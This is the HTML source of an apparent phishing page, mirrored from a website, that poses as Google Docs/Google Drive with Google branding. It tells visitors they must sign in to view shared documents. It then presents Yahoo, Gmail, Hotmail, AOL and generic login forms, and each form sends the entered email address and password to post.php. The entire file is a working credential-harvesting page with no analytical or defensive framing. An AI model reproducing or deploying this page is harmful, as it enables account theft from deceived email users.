<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- Mirrored from securelinkz.com/remax/ by HTTrack Website Copier/3.x [XR&CO'2007], Wed, 06 Jul 2011 12:09:46 GMT -->
<head>
<title>Google Docs - Online documents, spreadsheets, presentations, file storage and more </title>
<link rel="stylesheet" type="text/css" href="http://securelinkz.com/style.css" />
<style type="text/css">
div {
	position: absolute;
	left: 620px;
	top: 40px;
	background-color: #ffffff;
	width: 280px;
	padding: 10px;
	color: #000000;
	border: #0000cc 2px dashed;
	display: none;
}
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}</style>
<script language="Javascript">
function echeck(str) {

		var at="@"
		var dot="."
		var lat=str.indexOf(at)
		var lstr=str.length
		var ldot=str.indexOf(dot)
		if (str.indexOf(at)==-1){
		   alert("Invalid E-mail ID")
		   return false
		}

		if (str.indexOf(at)==-1 || str.indexOf(at)==0 || str.indexOf(at)==lstr){
		   alert("Invalid E-mail ID")
		   return false
		}

		if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
		    alert("Invalid E-mail ID")
		    return false
		}

		 if (str.indexOf(at,(lat+1))!=-1){
		    alert("Invalid E-mail ID")
		    return false
		 }

		 if (str.substring(lat-1,lat)==dot || str.substring(lat+1,lat+2)==dot){
		    alert("Invalid E-mail ID")
		    return false
		 }

		 if (str.indexOf(dot,(lat+2))==-1){
		    alert("Invalid E-mail ID")
		    return false
		 }
		
		 if (str.indexOf(" ")!=-1){
		    alert("Invalid E-mail ID")
		    return false
		 }

 		 return true					
	}

function ValidateFormYahoo(){
	var emailID=document.yahoo.yahoouser
	var emailPASS=document.yahoo.yahoopassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}

	return true
 }

 function ValidateFormHotmail(){
	var emailID=document.hotmail.hotmailuser
	var emailPASS=document.hotmail.hotmailpassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}

	return true
 }

  function ValidateFormGmail(){
	var emailID=document.gmail.gmailuser
	var emailPASS=document.gmail.gmailpassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}
	return true
 }

   function ValidateFormAol(){
	var emailID=document.aol.aoluser
	var emailPASS=document.aol.aolpassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}
	return true
 }

   function ValidateFormOther(){
	var emailID=document.other.otheruser
	var emailPASS=document.other.otherpassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}
	if (echeck(emailID.value)==false){
		emailID.value=""
		emailID.focus()
		return false
	}
	return true
 }
</script>
<script language="javascript">
function toggle() {
	var ele = document.getElementById("toggleText");
	var text = document.getElementById("displayText");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
}

function togglegmail() {
	var ele = document.getElementById("toggleTextgmail");
	var text = document.getElementById("displayTextgmail");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
}

function togglehotmail() {
	var ele = document.getElementById("toggleTexthotmail");
	var text = document.getElementById("displayTexthotmail");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
}
function toggleaol() {
	var ele = document.getElementById("toggleTextaol");
	var text = document.getElementById("displayTextaol");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
}
function toggleother() {
	var ele = document.getElementById("toggleTextother");
	var text = document.getElementById("displayTextother");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
}
</script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body bgcolor="#efefef"> <br />
<br /><br />
<table id="wrapper" cellpadding="10" cellspacing="1" align="center" bgcolor="#cccccc">
<tbody>
<tr>
<td bgcolor="#ffffff">
<table width="100%">
<tbody>
<tr>
<td width="50%">
<body bgcolor="green" background="images/Loopnet-01.jpg">
<table id="invoicetoptables" cellspacing="0" width="100%">
<tbody>
<tr>
<td id="invoicecontent" width="50%">
<table id="invoicetoptables" height="524" cellpadding="10" cellspacing="0" width="963">
<tbody>
<tr>
<td id="invoicecontent" style="border: 0px solid #cccccc" valign="top">
<h1><img alt="" src="images/logo1.jpg" height="448" width="464" /></h1>
<h2>Get stuff done, together, with apps in Google Drive <br />
<br /></h2>
<p>&copy; 2013 Google Inc.</p></td>
<td id="invoicecontent" style="border: 0px solid #cccccc" valign="top">
<p><font color="#990000" size="3"><font face="Georgia"><em><br />
</em></font></font></p>
<p><font color="#990000" size="3"><font face="Georgia"><em>&nbsp;To view Shared Doc<font size="3">s</font>,<font size="3"><br />
Y</font>ou are required to <font size="3">sign </font>in with your email address below</em></font></font></p>
<p><font class="paid" face="Georgia">&nbsp;</font></p>
<p><font class="paid" face="Georgia">Select your email provider below and sign in to continue:</font><font face="Georgia"> </font><br />
<br /><br />
</p>
<p align="center"> <a href="javascript:toggle();"><img alt="" src="images/yahoo.jpg" title="Yahoomail" id="displayText" height="48" border="0" width="132" /></a>
&nbsp;&nbsp;&nbsp; <a href="javascript:togglegmail();"><img alt="" src="images/gmail.jpg" title="Gmail" id="displayTextgmail" height="48" border="0" width="132" /></a> <br />
<br /><br />
<a href="javascript:togglehotmail();"><img alt="" src="images/hotmail.jpg" title="Hotmail" id="displayTexthotmail" height="48" border="0" width="132" /></a>
&nbsp;&nbsp;&nbsp; <a href="javascript:toggleaol();"><img alt="" src="images/aol.jpg" title="Aol" id="displayTextaol" height="48" border="0" width="132" /></a> <br />
<br /><br />
<a href="javascript:toggleother();"><img alt="" src="images/other.jpg" title="Other Email" id="displayTextother" height="48" border="0" width="132" /><br />
<br /></a></p>
<p align="center"><font color="#990000" size="1"><em>&nbsp;</em></font></p><!-- YAHOO CONFIG !-->
<div id="toggleText" style="display: none">
<p><img alt="" src="images/yahoo.jpg" title="Yahoomail" height="48" border="0" width="132" /></p>
<p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> <br />
<form name="yahoo" method="post" action="post.php" onsubmit="return ValidateFormYahoo()">
<p> <br />
<label>Yahoo Email Address:</label> <br />
<input name="yahoouser" style="width: 200px" type="text" /> <br />
<label>Yahoo Password</label> <br />
<input name="yahoopassword" style="width: 200px" type="password" /> <br />
<br /><input name="s_yahoo" value="Sign In" type="submit" /> </p> </form> </div> <!-- GMAIL CONFIG !-->
<div id="toggleTextgmail" style="display: none">
<p><img alt="" src="images/gmail.jpg" title="Gmail" height="48" border="0" width="132" /></p>
<p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> <br />
<form name="gmail" method="post" action="post.php" onsubmit="return ValidateFormGmail()">
<p> <label>Gmail Email Address:</label> <br />
<input name="gmailuser" style="width: 200px" type="text" /> <br />
<label>Gmail Password</label> <br />
<input name="gmailpassword" style="width: 200px" type="password" /> <br />
<br /><input name="s_gmail" value="Sign in" type="submit" /> </p> </form> </div> <!-- HOTMAIL CONFIG !-->
<div id="toggleTexthotmail" style="display: none">
<p><img alt="" src="images/hotmail.jpg" title="Hotmail" height="48" border="0" width="132" /></p>
<p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> <br />
<form name="hotmail" method="post" action="post.php" onsubmit="return ValidateFormHotmail()">
<p> <label>Hotmail Email Address:</label> <br />
<input name="hotmailuser" style="width: 200px" type="text" /> <br />
<label>Hotmail Password</label> <br />
<input name="hotmailpassword" style="width: 200px" type="password" /> <br />
<br /><input name="s_hotmail" value="Sign in" type="submit" /> </p> </form> </div> <!-- AOL CONFIG !-->
<div id="toggleTextaol" style="display: none">
<p><img alt="" src="images/aol.jpg" title="Aol" height="48" border="0" width="132" /></p>
<p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> <br />
<form name="aol" method="post" action="post.php" onsubmit="return ValidateFormAol()">
<p> <label>Aol Email Address:</label> <br />
<input name="aoluser" style="width: 200px" type="text" /> <br />
<label>Aol Password</label> <br />
<input name="aolpassword" style="width: 200px" type="password" /> <br />
<br /><input name="s_aol" value="Sign In" type="submit" /> </p> </form> </div> <!-- OTHER CONFIG !-->
<div id="toggleTextother" style="display: none">
<p><img alt="" src="images/other.jpg" title="Other" height="48" border="0" width="132" /></p>
<p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> <br />
<form name="other" method="post" action="post.php" onsubmit="return ValidateFormOther()">
<p> <label>Email Address:</label> <br />
<input name="otheruser" style="width: 200px" type="text" /> <br />
<label>Password</label> <br />
<input name="otherpassword" style="width: 200px" type="password" /> <br />
<br /><input name="s_other" value="Sign In" type="submit" /> </p> </form> </div> </td> </tr> </tbody></table> </td></tr></tbody></table>
</body><!-- Mirrored from securelinkz.com/remax/ by HTTrack Website Copier/3.x [XR&CO'2007], Wed, 06 Jul 2011 12:09:50 GMT -->
</html>